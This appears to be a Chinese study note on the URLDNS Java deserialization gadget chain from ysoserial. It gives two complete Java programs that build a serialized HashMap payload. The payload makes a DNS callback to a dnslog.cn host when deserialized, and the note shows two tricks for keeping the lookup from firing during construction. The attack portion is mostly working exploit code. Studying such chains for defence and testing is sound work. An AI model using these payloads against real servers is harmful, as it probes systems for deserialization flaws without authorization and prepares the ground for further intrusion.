学习链接
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java
链结构
- Gadget Chain:
-
HashMap.readObject()
-
HashMap.putVal()
-
HashMap.hash()
-
URL.hashCode()
原链
package org.example.dnsurl;
import java.io.*;
import java.lang.reflect.Field;
import java.net.*;
import java.util.HashMap;
import java.util.Map;
public class dd1h {
public static StringBuffer Httpget(String urli) throws IOException {
StringBuffer sb = new StringBuffer();
URL url = new URL(urli);
InputStream in = url.openStream();
BufferedInputStream br = new BufferedInputStream(in);
byte[] k = new byte[2048];
int r = 1;
while (r!=-1){
r = br.read(k);
sb.append(new String(k));
}
return sb;
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
URLStreamHandler handler = new SilentURLStreamHandler();
URL url = new URL(null,"http://4bpeqy.dnslog.cn",handler);
// url.hashCode();
Map<Object,Object> mp = new HashMap<>();
mp.put(url,"y");
// hash(Object key)
Class cls = url.getClass();
Field field = cls.getDeclaredField("hashCode");
field.setAccessible(true);
field.set(url,-1);
serialize(mp);
// unserialize("ser.bin");
}
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
}
绕过触发
使用了一个自定义类
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
最后还要反射修改hash值
Class cls = url.getClass();
Field field = cls.getDeclaredField("hashCode");
field.setAccessible(true);
field.set(url,-1);
diy链
package org.example.dnsurl;
import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.util.Map;
public class dd1h2 {
public static StringBuffer Httpget(String urli) throws IOException {
StringBuffer sb = new StringBuffer();
URL url = new URL(urli);
InputStream in = url.openStream();
BufferedInputStream br = new BufferedInputStream(in);
byte[] k = new byte[2048];
int r = 1;
while (r!=-1){
r = br.read(k);
sb.append(new String(k));
}
return sb;
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
URL url = new URL("http://qi77bp.dnslog.cn");
Class cls = url.getClass();
Field field = cls.getDeclaredField("hashCode");
field.setAccessible(true);
field.set(url,1234);
// url.hashCode();
Map<Object,Object> mp = new HashMap<>();
mp.put(url,"y");
// hash(Object key)
field.setAccessible(true);
field.set(url,-1);
serialize(mp);
// unserialize("ser.bin");
}
}
通过前后两次修改hash值避免触发